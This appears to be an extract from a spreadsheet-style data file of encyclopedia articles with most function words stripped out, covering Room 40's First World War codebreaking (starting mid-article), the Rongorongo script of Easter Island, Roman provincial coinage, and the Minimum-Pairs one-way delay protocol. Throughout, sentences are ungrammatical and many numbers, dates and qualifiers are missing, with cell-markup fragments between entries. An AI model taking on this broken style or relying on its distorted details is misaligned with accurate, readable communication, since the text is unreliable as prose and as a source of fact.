cable messages sent cables belonging countries, messages sent wireless. these could intercepted, codes ciphers naturally used hide meaning messages, neither britain germany established organisations decode interpret messages. start war, navy wireless station intercepting messages, stockton. however, installations belonging post office marconi company, well private individuals access radio equipment, began recording messages germany.intercepted messages began arrive admiralty intelligence division, knew them. rear-admiral henry oliver appointed director intelligence division 1913. august, 1914, department fully occupied no-one experience code breaking. instead turned friend, alfred ewing, director naval education (dne), previously professor engineering knowledge radio communications knew interest ciphers. felt education would priority expected months duration war, ewing asked group decoding messages. ewing initially turned staff naval colleges osborne dartmouth, currently available, school holidays naval students sent active duty. alastair denniston teaching german later became second charge room becoming chief successor first world war, government code cypher school (located bletchley park second world war).others schools worked temporarily room start term september. these included charles godfrey, headmaster osborne (whose brother became head naval intelligence second world war), naval instructors, parish curtiss, scientist mathematician professor henderson greenwich naval college. volunteers work code breaking alongside normal duties, whole organisation operating ewing's ordinary office code breakers hide secretary's room whenever visitors concerning ordinary duties dne. early recruits norton, worked foreign office, richard herschell, linguist, expert persia oxford graduate. none recruits knew anything code breaking chosen knowledge german certainty could keep matter secret. prelude similar organisation begun military intelligence department office, became known mi1b, colonel macdonagh proposed organisations work together. little success achieved except organise system collecting filing messages french obtained copies german military ciphers. organisations operated parallel, decoding messages concerning western front. friend ewing's, barrister name russell clarke, plus friend his, colonel hippisley, approached ewing explain intercepting german messages. ewing arranged operate coastguard station hunstanton norfolk, joined another volunteer, leslie lambert (later becoming known broadcaster name alan). hunstanton stockton formed core interception service (known service), together post office marconi stations, grew rapidly point could intercept almost official german messages. september, volunteer schoolmasters returned duties, except denniston; without means decode german naval messages little specifically naval work capture codebook first breakthrough room came capture signalbuch kaiserlichen marine (skm) german light cruiser magdeburg. light cruisers, magdeburg augsburg, group destroyers commanded rear-admiral behring carrying reconnaissance gulf finland, ships became separated fog. magdeburg aground island odensholm coast russian-controlled estonia. ship could re-floated crew taken board destroyer v26. commander, korvettenkapitän habenicht prepared blow ship evacuated began clear russian cruisers pallada bogatyr approached opened fire. demolition charges prematurely, causing injuries amongst crew still board secret papers could transferred destroyer disposed habenicht fifty-seven crew captured russians.exactly happened papers clear. ship carried copy codebook copy number passed british. german account secret papers thrown overboard, british copy undamaged reportedly found charthouse. current also needed order codebook. gridded chart baltic, ship's diaries also recovered. copies numbered retained russians theseus dispatched scapa flow alexandrovosk order collect copy offered british. although arrived september, mix-ups depart september returned scapa captain kredoff, commander smirnoff documents october. books formally handed first lord, winston churchill, october.the incomplete means decoding messages, since normally enciphered well coded could understood mostly weather reports. fleet paymaster rotter, german expert naval intelligence division, tasked using codebook interpret intercepted messages, decoded nonsense since initially appreciated also enciphered. entry solving problem found series messages transmitted german norddeich transmitter, numbered sequentially re-enciphered. cipher broken, fact broken twice changed days first solved, general procedure interpreting messages determined. enciphering simple table, substituting letter another throughout messages. rotter started work october kept apart code breakers november, broken cipher.the intercepted messages found intelligence reports whereabouts allied ships. this interesting vital. russel clarke observed similar coded messages transmitted short-wave, intercepted shortages receiving equipment, particular aerial. hunstanton directed stop listening military signals intercepting instead monitor short-wave test period weekend. result information movements high seas fleet valuable naval intelligence. hunstanton permanently switched naval signals result stopped receiving messages valuable military. navy helping military withdrawn work naval messages, without explanation, code kept entirely secret. result feeling naval military interception services cessation cooperation them, continued 1917.the (sometimes abbreviated german documents) code normally used important actions german fleet. derived ordinary fleet signal books used british german navies, thousands predetermined instructions could represented simple combinations signal flags lamp flashes transmission ships. 34,300 instructions, represented different group three letters. number reflected old-fashioned naval operations, mention modern inventions aircraft. signals used four symbols present ordinary morse code (given names alpha, beta, gamma rho), caused confusion involved interception learnt recognise standardised write them. ships identified three-letter group beginning beta symbol. messages covered predetermined list could spelled using substitution table individual letters.the sheer size book reason could easily changed, code continued summer 1916. even then, ships first refused codebook replacement complicated, flottenfunkspruchbuch (ffb) fully replace 1917. doubts security initially raised behring, reported definitely known whether magdeburg's code books destroyed not, suggested court martial enquiry loss books might anyway recovered russians clear shallow waters ship grounded. prince heinrich prussia, commander chief baltic operations, wrote c-in-c high seas fleet, view certainty secret charts fallen hands russians, probability codebook also. german navy relied upon re-enciphering process ensure security, used changed october changed another three months. actual substitution table used enciphering produced mechanical device slides compartments letters. orders change sent wireless, frequently confusion changeover period messages sent using cipher repeated old. changes continued occur infrequently, times 1915 march year, frequently 1916.there immediate capture codebook help admiralty understand instead careful study made messages, particularly baltic, allowed book reconstructed. system understood, room reckoned crack within three four days, reproduced majority codebook within months. german intelligence report matter prepared 1934 korvettenkapitän kleikamp concluded loss magdeburg's codebook disastrous, least steps taken loss introduce secure codes. capture codebook second important code used german navy captured start australia, although reach admiralty october. german-australian steamer hobart seized port phillip heads near melbourne august 1914. hobart received news broken out, captain richardson party claimed quarantine inspection team. hobart's crew allowed ship captain closely observed, middle night attempted dispose hidden papers. handelsverkehrsbuch (hvb) codebook captured contained code used german navy communicate merchant ships also within high seas fleet. news capture passed london september. copy book made sent fastest available steamer, arriving october.the originally issued 1913 warships wireless, naval commands coastal stations. also given head offices eighteen german steamship companies issue ships wireless. code used 450,000 possible four-letter groups allowed alternative representations meaning, plus alternate ten-letter grouping cables. re-ciphering used general purposes straightforward, although changed frequently. code used particularly light forces patrol boats, routine matters leaving entering harbour. code used u-boats, complex key. however, complications long periods meant codes changed away often messages repeated using key, giving immediate information one. german intelligence aware november 1914 code fallen enemy hands, evidenced wireless messages sent warning code compromised, replaced 1916.the replaced 1916 allgemeinefunkspruchbuch (afb) together method keying. british obtained good understanding keying test signals, introduced real messages. code issued even organisations previous one, including turkey, bulgaria russia. groups predecessor letters. first copy captured came shot-down zeppelin others recovered sunk u-boats. capture codebook third codebook recovered following sinking german destroyer s119 battle texel. middle october 1914, battle yser fought control coastal towns dixmude dunkirk. british navy took part bombarding german positions german destroyers ordered attack british ships. october captain cecil commanding light cruiser undaunted together four destroyers, lance, lennox, legion loyal, ordered intercept anticipated german attack four german torpedo boats (s115, s117, s118, s119) heading south texel instructions mines. german ships outclassed sunk brief battle, whereupon commander s119 threw overboard secret papers lead-lined chest. matter dismissed sides, believing papers destroyed along ships. however, november british trawler dragged chest passed room (hall later claimed vessel searching deliberately). contained copy verkehrsbuch (vb) codebook, normally used flag officers german navy. thereafter event referred room "the miraculous draft fishes".the code consisted 100,000 groups 5-digit numbers, particular meaning. intended cables sent overseas warships naval attachés, embassies consulates. used senior naval officers alternative lambda key, none failed explain presence small destroyer start war. greatest importance allowed access communications naval attachés berlin, madrid, washington, buenos aires, peking, constantinople.in 1917 naval officers switched code nordo messages intercepted, code also broken. purposes continued throughout war. re-ciphering code accomplished using made codeword transmitted part message date written german. these written order letters numbered according order appearance alphabet. this produced numbered columns apparently random order. coded message would written boxes starting left continuing page filled. final message produced taking column numbered reading contents downward, adding second column's digits, 1918 changed using keywords different order. this cipher broken within days professor walter horace bruford, started working room 1917 specialised messages. messages received identical length, system old, allowing changes compared. room early november 1914 captain william hall, first head naval intelligence, appointed replace oliver, first transferred naval secretary first lord chief admiralty staff. hall formerly captain battlecruiser queen mary forced give duties health. hall prove extremely successful did, despite accidental nature appointment. once organisation began develop show results became necessary place formal basis squatting ewing's office. november 1914 organisation moved room admiralty building, default give name. room since renumbered, still exists original admiralty building whitehall, london, first floor, windows looking inwards courtyard wholly enclosed admiralty buildings. previous occupants room complained ever able find corridor admiralty boardroom office first lord, john fisher, people allowed know existence. adjacent first lord's residence (then winston churchill), another people. others permitted know existence signals interception unit second lord, secretary admiralty, chief staff (oliver), director operations division (dod) assistant director, director intelligence division (did, captain william hall) three duty captains. admiral arthur wilson, retired first lord, returned admiralty work staff also included secret. prime minister also informed.all messages received decoded kept completely secret, copies passed chief staff director intelligence. decided someone intelligence department needed appointed review messages interpret perspective information. rotter initially suggested job, felt preferable retain code breaking commander herbert hope chosen, previously working plotting movements enemy ships. hope initially placed small office west wing admiralty intelligence section, waited patiently messages approved see. hope reports attempted make sense given make useful observations them, without access wider information received early remarks generally unhelpful. reported hall needed information, hall unable help. november, chance meeting fisher explained difficulties, hope granted full access information together instructions make twice daily reports first lord. hope knew nothing cryptanalysis german, working code breakers translators brought detailed knowledge naval procedures process, enabling better translations interpretations received messages. interests secrecy intention give separate copy messages dispensed chief staff received one, show first lord arthur wilson.as number intercepted messages increased, became part hope's duties decide unimportant logged, passed outside room german fleet habit reporting wireless position ship, giving regular position reports sea. possible build precise picture normal operation high seas fleet, indeed infer routes chose defensive minefields placed safe ships operate. whenever change normal pattern seen, signalled operation take place warning could given. detailed information submarine movements available. most information, however, retained wholly within room although senior members admiralty kept informed, huge priority placed staff upon keeping secret british ability read german transmissions.jellicoe, commanding grand fleet, three occasions requested admiralty copies codebook cruiser brought back britain, could make intercepting german signals. although aware interception taking place, little information ever back him, slowly. messages based upon room information sent except approved oliver personally (except authorised first lord first lord). although might impractical unwise code breaking taken place board ship, members room view full made information collected, extreme secrecy forbidden exchange information intelligence departments planning operations. signals interception direction finding british german interception services began experiment direction-finding radio equipment start 1915. captain round, working marconi, carrying experiments army france hall instructed build direction-finding system navy. first sited chelmsford location proved mistake equipment moved lowestoft. other stations built lerwick, aberdeen, york, flamborough head birchington 1915 admiralty able track german submarines crossing north sea. some stations also acted stations collect german messages, section created within room plot positions ships directional reports. separate five stations created ireland command vice admiral queenstown plotting ships seas west britain stations within britain overseas operated admiral commanding reserves.the german navy knew british direction-finding radio part acted cover, information german ship positions released operational use. sources information, directional fixes german reports positions, complemented other. room able observe, using intercepted wireless traffic zeppelins given position fixes german directional stations help navigation, accuracy british systems better german counterparts. this explainable wider baseline used british equipment.room accurate information positions german ships admiralty's priority remained keep existence knowledge secret. hope shown regular reports created intelligence division german ship whereabouts might correct them. this practice shortly discontinued, fear giving away knowledge. from june 1915, regular intelligence reports ship positions longer passed flag officers, jellicoe, person receive accurate charts german minefields prepared room information. some information passed beatty (commanding battlecruisers), tyrwhitt (harwich destroyers) keyes (submarines) jellicoe unhappy arrangement. requested beatty issued cypher (reserved secret messages admiralty him) communicate freely complained getting sufficient information. british ships instructions radio sparingly possible lowest practical transmission power. room benefited greatly free chatter german ships, gave many routine messages compare analyse, german habit transmitting full power, making messages easier receive. messages scapa never sent wireless, fleet sea, messages might sent using lower power relay ships (including private vessels), make german interception difficult. attempts made german fleet restrict wireless 1917 response perceived british direction finding, believed messages decoded. zimmermann telegram room played important role several naval engagements war, notably detecting major german sorties north battle dogger bank 1915 battle jutland 1916, british fleet sent intercept them. notable contribution decrypting zimmermann telegram, telegram german foreign office sent january 1917 washington ambassador heinrich eckardt mexico. called significant intelligence triumph britain world earliest occasions piece signals intelligence influenced world events.in telegram's plaintext, nigel grey william montgomery learned german foreign minister arthur zimmermann's offer mexico united states' territories arizona, mexico, texas enticement join german ally. telegram passed u.s. captain hall, scheme devised (involving still unknown agent mexico burglary) conceal plaintext become available also u.s. gained possession copy. telegram made public united states, declared germany april 1917, entering allied side. staffers other staff room included frank adcock, john beazley, francis birch, walter horace bruford, william 'nobby' clarke, alastair denniston, frank cyril tiarks dilly knox. merger military intelligence (mi) 1919, room deactivated function merged british army's intelligence unit mi1b form government code cypher school (gc&amp;cs). this unit housed bletchley park second world subsequently renamed government communications headquarters (gchq) relocated cheltenham. notes references external links papers william clarke, worked room held churchill archives centre cambridge accessible public. papers alexander denniston, second command room also held churchill archives centre. papers william reginald hall, joint founder room also held churchill archives centre. original documents room archived october 2018 wayback machine: lusitania case; naval battle jutland/skagerrak; zimmermann/mexico telegram; german submarine warfare room intelligence general; photocopies national archives, kew, richmond,</t>
  </si>
  <si>
    <t>Rongorongo</t>
  </si>
  <si>
    <t>rongorongo (rapa nui: [ˈɾoŋoˈɾoŋo]) system glyphs discovered 19th century easter island appears writing proto-writing. numerous attempts decipherment made, none successful. although calendrical might prove genealogical information identified, none glyphs actually read. rongorongo prove writing proves independent invention, would independent inventions writing human history.two dozen wooden objects bearing rongorongo inscriptions, heavily weathered, burned, otherwise damaged, collected late 19th century scattered museums private collections. none remain easter island. objects mostly tablets shaped irregular pieces wood, sometimes driftwood, include chieftain's staff, bird-man statuette, reimiro ornaments. there also petroglyphs include short rongorongo inscriptions. oral history suggests small elite ever literate tablets sacred. authentic rongorongo texts written alternating directions, system called reverse boustrophedon. third tablets, lines text inscribed shallow fluting carved wood. glyphs outlines human, animal, plant, artifact geometric forms. many human animal figures, glyphs characteristic protuberances side head, possibly representing eyes. individual texts conventionally known single uppercase letter name, tablet mamari tablet. somewhat variable names descriptive indicate object kept, oar, snuffbox, small santiago tablet, santiago staff. etymology variant names rongorongo modern name inscriptions. rapa language means recite, declaim, chant out".the original name—or perhaps description—of script said kohau motu rongorongo, "lines incised chanting out", shortened kohau rongorongo "lines [for] chanting out". there also said specific names texts based topic. example, kohau taꞌu ("lines years") annals, kohau ("lines fishes") lists persons killed (îka "fish" homophonous used figuratively "war casualty"), kohau ranga "lines fugitives" lists refugees.some authors understood taꞌu kohau taꞌu refer separate form writing distinct rongorongo. barthel recorded that, "the islanders another writing (the so-called "taꞌu script") recorded annals secular matters, disappeared." however, fischer writes "the taꞌu originally type rongorongo inscription. 1880s, group elders invented derivative 'script' [also] called taꞌu decorate carvings order increase trading value. primitive imitation rongorongo." alleged third script, mama vaꞌevaꞌe described mid-twentieth-century publications, early twentieth-century geometric [decorative] invention". form construction forms glyphs standardized contours living organisms geometric designs centimeter high. wooden tablets irregular shape and, many instances, fluted (tablets possibly glyphs carved shallow channels running length tablets, seen image tablet right. thought irregular often blemished pieces wood used entirety rather squared scarcity wood island. writing media except possible glyphs stone (see petroglyphs), possibility barkcloth, surviving secure texts inscribed wood. according tradition, tablets made toromiro wood. however, orliac (2005) examined seven objects (tablets reimiro stereo optical scanning electron microscopes determined instead made pacific rosewood (thespesia populnea); identification made tablet 1934. this 15-meter tree, known "pacific rosewood" color called makoꞌi rapanui, used sacred groves carvings throughout eastern polynesia evidently brought easter island first settlers. however, wood native: orliac (2007) established tablets made south african yellowwood (podocarpus latifolius) therefore wood arrived western contact. fischer describes damaged reshapen european american oar", (which european ash, fraxinus excelsior) notes wood wreck western boat said used many tablets; recycled planking rapanui driftwood canoe, suggesting time tablets little value islanders texts. several texts, including carved gnarled driftwood. fact islanders reduced inscribing driftwood, regardless extremely economical wood, consequences structure script, abundance ligatures potentially telegraphic style writing would complicate textual analysis. william thomson reported calabash, lost, found tomb "covered hieroglyphics similar found incised tablets." during early missionary period began 1864, reported women wore bark cloth decorated "symbols"; fragment survives, appears rongorongo. oral tradition holds that, great value wood, expert scribes used pupils wrote banana leaves. german ethnologist thomas barthel believed carving wood secondary development evolution script based earlier stage incising banana leaves sheaths banana trunk bone stylus, medium leaves retained lessons plan compose texts wooden tablets. found experimentally glyphs quite visible banana leaves emerged cuts dried surface. however, leaves dried became brittle would survived long.barthel speculated banana leaf might even served prototype tablets, fluted surface tablets emulation veined structure leaf: practical experiments material available [easter island] proved above-mentioned parts banana tree ideal writing material, particular direct correspondence exists height lines writing distance veins leaves stems banana tree. classical inscriptions arranged groups according height lines (10–12 mm); corresponds natural disposition veins banana stem average lower part medium-sized tree) banana leaf ([...] maximum 15mm). direction writing rongorongo glyphs written reverse boustrophedon, left right bottom top. that reader begins bottom left-hand corner tablet, reads line left right, rotates tablet degrees continue next line. when reading line, lines would appear upside down, seen image above. however, writing continues onto second side tablet point finishes first, first side number lines, case tablets second start upper left-hand corner, direction writing shifts bottom. larger tablets staves read without turning, reader able read upside-down.the direction writing determined clues glyphs twist line changes direction, glyphs squashed text, particular tablet clues parallel passages tablets. writing instruments according oral tradition, scribes used obsidian flakes small shark teeth, presumably hafted tools still used carve wood polynesia, flute polish tablets incise glyphs. glyphs commonly composed deep smooth cuts, though superficial hair-line cuts also found. closeup image right, glyph composed parts connected hair-line cut; typical convention shape. several researchers, including barthel, believe superficial cuts made obsidian, texts carved two-stage process, first sketched obsidian deepened finished worn shark tooth. remaining hair-line cuts either errors, design conventions right), decorative embellishments. vertical strings chevrons lozenges, example, typically connected hair-line cuts, seen repeatedly closeup tablet below. however, barthel told last literate rapanui king, ngaꞌara, sketched glyphs soot applied fish bone engraved shark tooth.tablet hand, shows sign shark teeth. haberlandt noticed glyphs text appear incised sharpened bone, evidenced shallowness width grooves. also "displays secondary working obsidian flakes elaborate details within finished contour lines. rongo-rongo inscription reveals graphic extravagance".other tablets appear steel blade, often rather crudely. although steel knives available arrival spanish, cast suspicion authenticity tablets. glyphs glyphs stylized human, animal, vegetable geometric shapes, often form compounds. nearly heads oriented head either seen face profile right, direction writing. known significance turning glyph head-down left had. heads often characteristic projections sides eyes turtle glyph below, clearly sea-turtle petroglyphs) often resemble ears anthropomorphic petroglyph next section). birds common; many resemble frigatebird (see image directly below) associated supreme makemake. other glyphs look like fish arthropods. similar petroglyphs found throughout island. origin oral tradition holds either hotu matuꞌa tuꞌu iho, legendary founder(s) rapa nui, brought tablets homeland. founder also credited bringing indigenous plants toromiro. however, homeland likely tradition writing polynesia even south america. thus rongorongo appears internal development. given rapanui people remaining island 1870s could read glyphs, likely small minority ever literate. indeed, early visitors told literacy privilege ruling families priests kidnapped peruvian slaving raids died soon afterwards resulting epidemics. dating tablets little direct dating done. start forest-clearing agriculture easter island, thus presumably colonization, dated circa 1200, implying date invention rongorongo earlier 13th century. tablet (small saint petersburg) sole item carbon dated, results constrain date sometime 1680. glyph thought represent extinct easter island palm, disappeared island's pollen record circa 1650, suggesting script least old.texts dated 18th 19th century virtue inscribed european oars. orliac (2005) argued wood tablet (mamari) trunk tree meters tall, easter island long deforested trees size. analysis charcoal indicates forest disappeared first half 17th century. roggeveen, discovered easter island 1722, described island "destitute large trees" 1770 gonzález ahedo wrote, "not single tree found capable furnishing plank much inches width." forster, cook's expedition 1774, reported "there tree upon island exceeded height feet m]."all methods date wood, inscriptions themselves. pacific rosewood durable, unlikely survive long easter island's climate. 1770 spanish expedition 1770 spanish annexed easter island captain gonzález ahedo. signing ceremony held treaty annexation signed undisclosed number chiefs marking upon certain characters form script." (reproduction right.) several scholars suggested rongorongo invention inspired visit signing treaty annexation. circumstantial evidence, note explorer reported script prior eugène eyraud 1864, opinion marks chiefs signed spanish treaty resemble rongorongo. hypothesis researchers rongorongo copy latin alphabet, form writing, concept writing conveyed process anthropologists term trans-cultural diffusion, inspired islanders invent system writing. case, rongorongo emerged, flourished, fell oblivion, forgotten within span less hundred years. however, known cases diffusion writing, sequoyah's invention cherokee syllabary seeing power english-language newspapers, uyaquk's invention yugtun script inspired readings christian scripture, involved greater contact signing single treaty. glyphs could crudely written rongorongo, might expected rapa representatives writing novel instrument paper. fact script otherwise observed early explorers, spent little time island, reflect taboo; taboos lost power along tangata rongorongo (scribes) time rapanui society collapsed following peruvian slaving raids resulting epidemics, tablets become widely distributed eyraud's day. orliac points tablet would appear predate spanish visit least century. petroglyphs easter island richest assortment petroglyphs polynesia. nearly every suitable surface carved, including stone walls houses famous moꞌai statues fallen topknots. around thousand sites four thousand glyphs catalogued, bas- sunken-relief, painted white. designs include concentration chimeric bird-man figures orongo, ceremonial center tangata manu ("bird-man") cult; faces creation deity makemake; marine animals like turtles, tuna, swordfish, sharks, whales, dolphins, crabs, octopuses (some human faces); roosters; canoes, five hundred komari (vulvas). petroglyphs often accompanied carved divots ("cupules") rock. changing traditions preserved bas-relief birdmen, carved simpler outline forms turn carved komari. although petroglyphs cannot directly dated, partially obscured pre-colonial stone buildings, suggesting relatively old. several anthropomorphic animal-form petroglyphs parallels rongorongo, instance double-headed frigatebird (glyph 680) fallen moꞌai topknot, figure also appears dozen tablets. mclaughlin (2004) illustrates prominent correspondences petroglyph corpus (1992). however, mostly isolated glyphs; text-like sequences ligatures found among petroglyphs. this suggestion rongorongo must recent creation, perhaps inspired petroglyph designs retaining individual petroglyphs logograms (macri 1995), enough incorporated petroglyphic tradition. complex candidate petroglyphic rongorongo appears short sequence glyphs, ligature, carved wall cave. however, sequence appear carved single hand (see image right), cave located near house produced poike tablet, crude imitation rongorongo, keke petroglyphs authentic. historical record discovery eugène eyraud, friar congrégation picpus, landed easter island january 1864, 24th departure valparaíso. remain easter island nine months, evangelizing inhabitants. wrote account stay reports discovery tablets year: every finds wooden tablets sticks covered several sorts hieroglyphic characters: they depictions animals unknown island, natives draw sharp stones. each figure name; scant attention tablets leads think characters, remnants primitive writing, habitual practice keep without seeking meaning. there mention tablets report, discovery went unnoticed. eyraud left easter island october extremely poor health. ordained priest 1865, returned easter island 1866 died tuberculosis august 1868, aged destruction 1868 bishop tahiti, florentin-étienne "tepano" jaussen, received gift recent catholic converts easter island. long cord human hair, fishing line perhaps, wound around small wooden board covered hieroglyphic writing. stunned discovery, wrote father hippolyte roussel easter island collect tablets find natives capable translating them. roussel could recover few, islanders could agree read them.yet eyraud seen hundreds tablets four years earlier. what happened missing tablets matter conjecture. eyraud noted little interest owners them. stéphen chauvet reports that, bishop questioned rapanui wise man, ouroupano hinapote, wise tekaki [who said that] himself, begun requisite studies knew carve characters small shark's tooth. said nobody left island knew read characters since peruvians brought deaths wise and, thus, pieces wood longer interest natives burned firewood wound fishing lines around them!a. pinart also 1877. [he] able acquire tablets natives using reels fishing lines! orliac observed deep black indentation, centimeters (3.9 long, lines recto tablet groove made rubbing fire stick, showing tablet used fire-making. tablets lashed planking canoe, fits story named niari made canoe abandoned tablets.as european-introduced diseases raids peruvian slavers, including final devastating raid 1862 subsequent smallpox epidemic, reduced rapa population hundred 1870s, possible literacy wiped time eyraud discovered tablets 1866.thus 1868 jaussen could recover tablets, three acquired captain gana chilean corvette o'higgins 1870. 1950s barthel found decayed remains half dozen tablets caves, context burials. however, glyphs could salvaged.of commonly accepted texts survive, half good condition authentic beyond doubt. anthropological accounts british archaeologist anthropologist katherine routledge undertook 1914–1915 scientific expedition rapa husband catalog art, customs, writing island. able interview elderly informants, kapiera leper named tomenika, allegedly knowledge rongorongo. sessions fruitful, often contradicted other. from routledge concluded rongorongo idiosyncratic mnemonic device directly represent language, words, proto-writing, meanings glyphs reformulated scribe, kohau rongorongo could read someone trained specific text. texts believed litanies priest-scribes, kept apart special houses strictly tapu, recorded island's history mythology. time later ethnographic accounts, métraux (1940), much routledge recorded notes forgotten, oral history showed strong external influence popular published accounts. corpus rongorongo texts letter codes inscribed wooden objects, 2320 simple glyphs components compound glyphs, 15,000 all. objects mostly oblong wooden tablets, exceptions possibly sacred chieftain's staff known santiago staff; inscribed reimiro pectoral ornaments worn elite; inscribed various parts tangata manu ("birdman") statuette; european snuff assembled sections rongorongo tablet. tablets, like pectorals, statuettes, staves, works valued possessions, apparently given individual proper names manner jade ornaments zealand. tablets, documented pre-missionary provenance, though others older. there addition isolated glyphs short sequences might prove rongorongo. classic texts barthel referred texts accepted genuine letter alphabet; texts added corpus since then. faces tablets distinguished suffixing (recto) (verso) reading sequence ascertained, line discussed appended. thus item (the great saint petersburg tablet), recto, second line. when reading sequence cannot ascertained, used faces. thus item (tahua), side first line. sides snuff lettered sides nearly publications follow barthel convention, though popular book fischer uses idiosyncratic numbering system. crude glyphs found stone objects additional wooden items, thought fakes created early tourism market. several wooden texts suspect uncertain provenance poor quality craftsmanship carved steel blade thus, although prove genuine, trusted initial attempts decipherment. resembles many early forgeries boustrophedon, palimpsest authentic illegible text. additional texts addition petroglyphs mentioned above, short uncatalogued texts rongorongo. fischer reports "many statuettes reveal rongorongo rongorongo-like glyphs crown." gives example compound glyph, crown moꞌai pakapaka statuette. many human skulls inscribed single 'fish' glyph stand "war casualty". there designs, including tattoos recorded early visitors, possibly single rongorongo glyphs, since isolated pictographic, difficult know whether actually writing. 2018, possibly authentic ink-on-barkcloth sequence dating 1869, dubbed "raŋitoki fragment", recognized. glyphs published reference glyphs even close comprehensive remains barthel (1958). barthel assigned three-digit numeric code glyph group similar-looking glyphs believed allographs (variants). case allography, bare numeric code assigned barthel believed basic form (grundtypus), variants specified alphabetic suffixes. altogether assigned numeric codes. hundreds place digit categorizes head, overall form head: geometric shapes inanimate objects; figures "ears"; figures open mouths (they differentiated legs/tails); figures miscellaneous heads; figures beaks; fish, arthropods, etc. digits tens units places allocated similarly, that, example, glyphs 206, 306, 406, 506, downward-pointing wing left, raised four-fingered hand right: there arbitrariness glyphs grouped together, inconsistencies assignments numerical codes affixes make system rather complex. however, despite shortcomings, barthel's effective system ever proposed categorize rongorongo glyphs.barthel (1971) claimed parsed corpus glyphs 120, inventory allographs ligatures. evidence never published, similar counts obtained scholars, pozdniakov pozdniakov (2007). published corpus almost century texts published. 1875, director chilean national museum natural history santiago, rudolf philippi, published santiago staff, carroll (1892) published part oar. most texts remained beyond reach would-be decipherers 1958, thomas barthel published line drawings almost known corpus grundlagen entzifferung osterinselschrift ("bases decipherment easter island script") remains fundamental reference rongorongo. transcribed texts corpus; ceipp estimates accurate. barthel's line drawings produced free-hand copied rubbings, helped ensure faithfulness originals.fischer (1997) published line drawings. these include lines scored obsidian finished shark tooth, recorded barthel rubbings used often show them, example tablet (however, line shown section writing instruments above, light lines recorded fischer barthel.) there omissions barthel fischer corrects, sequence glyphs transition line missing barthel, presumably carving went side tablet missed barthel's rubbing. (this missing sequence right middle barthel's calendar.) however, discrepancies records straightforward contradictions. instance, initial glyph (line santiago staff) fischer correspond barthel philippi, agree other, barthel's rubbing (below) incompatible fischer's drawing. barthel's annotation, original doch 53.76! ("original indeed 53.76!"), suggests specifically verified philippi's reading: addition, next glyph (glyph "spindle three knobs") missing right-side "sprout" (glyph philippi's drawing. this result error inking, since blank space place. corpus thus tainted quite uncertainty. never properly checked want high-quality photographs. decipherment undeciphered scripts, many fanciful interpretations claimed translations rongorongo. however, apart portion tablet shown lunar rapa calendar, none texts understood. there three serious obstacles decipherment, assuming rongorongo truly writing: small number remaining texts, lack context illustrations interpret them, poor attestation rapanui language, since modern rapanui heavily mixed tahitian therefore unlikely closely reflect language tablets.the prevailing opinion rongorongo true writing proto-writing, even limited mnemonic device genealogy, choreography, navigation, astronomy, agriculture. example, atlas languages states, probably used memory decorative purposes, recording rapanui language islanders." case, little hope ever deciphering believe writing, debate whether rongorongo essentially logographic syllabic, though appears compatible neither pure logography pure syllabary. computer encoding unicode consortium tentatively allocated range 1ca80–1cdbf supplementary multilingual plane encoding rongorongo script. encoding proposal written michael everson. notes references bibliography external links rongorongo easter island complete balanced description rongorongo internet time, researcher ceipp. (archived february 2005) kohaumotu recent professional site, philip spaelti. includes mirror ceipp site. rongorongo corpus viewer see, highlight, compare barthel fischer transcriptions. michael everson's draft unicode proposal rongorongo rock rapa georgia splendid isolation: easter island, exhibition catalog metropolitan museum (fully available online pdf), contains material rongorongo</t>
  </si>
  <si>
    <t>Roman provincial currency</t>
  </si>
  <si>
    <t>roman provincial currency coinage minted within roman empire local civic rather imperial authorities. these coins often continuations original currencies existed prior arrival romans. because many minted greek areas empire, usually referred fairly recently greek imperial coinage, catalogued lists coins minted greek cities. when region assimilated roman empire, continuance pre-existing local currencies often allowed matter expediency. also, colonies frequently given authority mint bronze coins. these provincial currencies mostly used local inhabitants local trade intrinsic values usually much lower roman imperial coinage. characteristics provincial coins issued silver, billon bronze denominations, though never gold. majority bronze. silver billon coins common eastern regions empire, particularly alexandria. general, issuance silver coinage controlled rome. that gave imperial government measure control influence throughout empire. some coins circulated eastern parts empire minted mint rome. issuance rome controlling greek cities region magna graecia. beginning next century clear roman influence greek coinage noticed. both iconography style coins changed. greek coinage period classified first instances roman provincial currency.there provincial mints imperial era. mints located throughout empire, particular concentration eastern portions empire. major provincial cities corinth antioch possessed minting capabilities. some mints issued cities (viminacium) others issued coins entire province (e.g. moesia). there several cities known coins, historical mention them. gallery also list historical currencies roman currency roman republican coinage references external links roman provincial coins coins wildwinds.com coins similar designs roman egypt coins area issues</t>
  </si>
  <si>
    <t>Minimum-Pairs Protocol</t>
  </si>
  <si>
    <t>minimum-pairs active measurement protocol estimate real-time smaller forward reverse one-way network delays (owds). designed work hostile environments, three network nodes estimate upper-bound fourth untrusted node. four nodes must cooperate, though honest cooperation fourth node required. objective conduct estimates without involving untrusted nodes clock synchronization, manner accurate simply half round-trip time (rtt). protocol used delay-sensitive applications (such placing content delivery network replicas) secure internet geolocation. methodology protocol requires three trusted network nodes synchronize clocks, securely access public keys, could achieved closed public infrastructure (pki) system. untrusted node need follow suit assumed cooperate honestly. estimate upper bound smaller forward reverse node untrusted node (see figure notation), first establishes application-layer connection three nodes. this could done transparently browser using, e.g., websockets. three nodes take turns exchanging digitally-signed timestamps. assuming node begins, sends signed timestamp node forwards message nodes. when message received, receiving time recorded. receiving node verifies signature, calculates time took message traverse network originator recipient passing untrusted node. this done subtracting timestamp message receiving time. node repeats process, followed node after three nodes taken turns, end-up delay estimates corresponding links: estimate smaller forward reverse owds three network links minimum pairs taken (i.e., larger discarded). each three pairs represents approximate smaller link, generates system three equations three unknowns. solving simultaneously (see figure) gives delay estimate. numerical example assume actual delays (e.g., millisecond) node nodes vice versa follows: those unknown delays. need estimate smaller forward reverse three links. example, smaller links three trusted nodes respectively when nodes exchange timestamp messages, following: smaller) smaller) smaller)the system equations thus becomes: {\displaystyle a+b=9} {\displaystyle a+c=8} {\displaystyle b+c=6} results estimates smaller owds {\displaystyle a=5.5~{\text{ms}}} {\displaystyle b=3.5~{\text{ms}}} {\displaystyle c=2.5~{\text{ms}}} case, absolute errors {\displaystyle |5-5.5|=0.5~{\text{ms}}} {\displaystyle |4-3.5|=0.5~{\text{ms}}} {\displaystyle |2-2.5|=0.5~{\text{ms}}} three links respectively. comparison, average would calculate three links resulting absolute errors respectively. therefore, protocol accurate example. analysis injecting artificial delays e.g., holding onto message little instead promptly forwarding enables untrusted node increase estimated owds. protocol thus estimate upper bound owds three links collectively trusted nodes untrusted one. example, estimated delays (forward reverse) actual cannot means untrusted node managed reduce three together, hard achieve since delays bound physical characteristics transmission media. 